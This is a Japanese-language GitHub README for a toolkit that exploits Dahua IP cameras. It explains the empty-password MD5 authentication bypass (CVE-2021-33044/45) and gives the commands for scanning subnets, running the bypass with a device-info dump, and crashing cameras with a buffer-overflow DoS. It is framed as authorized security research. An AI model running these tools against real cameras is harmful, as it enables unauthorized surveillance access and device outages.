
Dahua IPカメラ CVE調査ツールキット (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ 開発中 — これらのスクリプトは公開されているCVEの詳細に基づいており、脆弱なデバイスに対するさらなるテストが必要です。
4つの深刻なDahua IPカメラの脆弱性に対する研究および概念実証スクリプト。
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
| CVE | CVSS | タイプ | ステータス |
|---|---|---|---|
| CVE-2021-33044 | 9.8 CRITICAL | 認証バイパス | CISA KEV (活発に悪用されている) |
| CVE-2021-33045 | 9.8 CRITICAL | 認証バイパス | CISA KEV (活発に悪用されている) |
| CVE-2025-31700 | 8.1 HIGH | バッファオーバーフロー DoS | 最近 (2025) |
| CVE-2025-31701 | 8.1 HIGH | バッファオーバーフロー DoS | 最近 (2025) |
Dahuaカメラは /RPC2_Login を介したチャレンジレスポンス認証を使用します:
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← 空パスワード
step2 = MD5("step1:random:step1")
脆弱なファームウェアは空パスワードのハッシュを受け入れ、有効なセッショントークンを返します。
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
一般的なDahuaポート: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # バイパス後にデバイス情報をダンプ
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTPのみ
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777のみ
⚠️ 警告: DoSスクリプトは対象デバイスをクラッシュさせる可能性があります。
requests
その他のインポートはすべてPython標準ライブラリからです:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 活発に開発中
これらのスクリプトは以下に基づいて開発されています:
テスト状況:
テスト用の脆弱なデバイスにアクセスできる場合、コントリビューションやフィードバックを歓迎します。
問題や誤検出があれば報告してください。
MIT ライセンス - LICENSE ファイルを参照してください。
Umair Aziz
GitHub: @umair-aziz025
教育および許可されたセキュリティ研究のみを目的としています。
| ファイル | 目的 | CVE |
|---|
dahua_scanner.py | ネットワーク探索 — サブネット上のDahuaカメラを検出 | 検出 |
dahua_exploit.py | マルチCVEスキャナー — すべての脆弱性をテスト | すべて |
dahua_auth_bypass.py | --dump オプション付きの専用認証バイパス | CVE-2021-33044/45 |
dahua_rce.py | バッファオーバーフロー DoS プローブ | CVE-2025-31700/01 |